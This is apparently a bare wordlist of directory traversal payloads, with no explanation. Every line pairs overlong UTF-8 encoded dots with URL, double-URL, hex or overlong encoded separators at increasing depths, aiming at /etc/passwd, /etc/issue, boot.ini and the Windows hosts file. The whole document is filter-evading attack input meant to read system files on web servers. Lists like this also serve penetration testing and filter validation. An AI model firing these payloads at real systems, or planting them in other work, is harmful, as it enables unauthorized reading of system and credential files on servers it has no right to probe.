-%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fetc%2fpasswd -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fetc%2fissue -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fboot.ini -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fetc%2fpasswd -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fetc%2fissue -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fboot.ini -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f0%80%80%ae%f0%80%80%ae%5cetc%5cpasswd -%f0%80%80%ae%f0%80%80%ae%5cetc%5cissue -%f0%80%80%ae%f0%80%80%ae%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cetc%5cpasswd -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cetc%5cissue -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cetc%5cpasswd -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cetc%5cissue -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cetc%5cpasswd -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cetc%5cissue -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cetc%5cpasswd -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cetc%5cissue -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cetc%5cpasswd -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cetc%5cissue -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cboot.ini -%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5c%f0%80%80%ae%f0%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fpasswd -%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fissue -%f0%80%80%ae%f0%80%80%ae0x2fboot.ini -%f0%80%80%ae%f0%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fpasswd -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fissue -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fboot.ini -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fpasswd -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fissue -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fboot.ini -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fpasswd -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fissue -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fboot.ini -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fpasswd -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fissue -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fboot.ini -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fpasswd -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fetc0x2fissue -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fboot.ini -%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2f%f0%80%80%ae%f0%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cpasswd -%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cissue -%f0%80%80%ae%f0%80%80%ae0x5cboot.ini -%f0%80%80%ae%f0%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cpasswd -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cissue -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cboot.ini -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cpasswd -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cissue -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cboot.ini -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cpasswd -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cissue -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cboot.ini -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cpasswd -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cissue -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cboot.ini -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cpasswd -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cetc0x5cissue -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cboot.ini -%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5c%f0%80%80%ae%f0%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f0%80%80%ae%f0%80%80%ae%252fetc%252fpasswd -%f0%80%80%ae%f0%80%80%ae%252fetc%252fissue -%f0%80%80%ae%f0%80%80%ae%252fboot.ini -%f0%80%80%ae%f0%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fetc%252fpasswd -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fetc%252fissue -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fboot.ini -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fetc%252fpasswd -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fetc%252fissue -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fboot.ini -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fetc%252fpasswd -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fetc%252fissue -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fboot.ini -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fetc%252fpasswd -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fetc%252fissue -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fboot.ini -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fetc%252fpasswd -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fetc%252fissue -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fboot.ini -%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252f%f0%80%80%ae%f0%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f0%80%80%ae%f0%80%80%ae%255cetc%255cpasswd -%f0%80%80%ae%f0%80%80%ae%255cetc%255cissue -%f0%80%80%ae%f0%80%80%ae%255cboot.ini -%f0%80%80%ae%f0%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cetc%255cpasswd -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cetc%255cissue -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cboot.ini -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cetc%255cpasswd -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cetc%255cissue -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cboot.ini -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cetc%255cpasswd -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cetc%255cissue -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cboot.ini -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cetc%255cpasswd -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cetc%255cissue -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cboot.ini -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cetc%255cpasswd -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cetc%255cissue -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cboot.ini -%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255c%f0%80%80%ae%f0%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fpasswd -%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fissue -%f0%80%80%ae%f0%80%80%ae%c0%2fboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fpasswd -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fissue -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fpasswd -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fissue -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fpasswd -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fissue -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fpasswd -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fissue -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fpasswd -%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2f%f0%80%80%ae%f0%80%80%ae%c0%2fetc%c0%2fissue 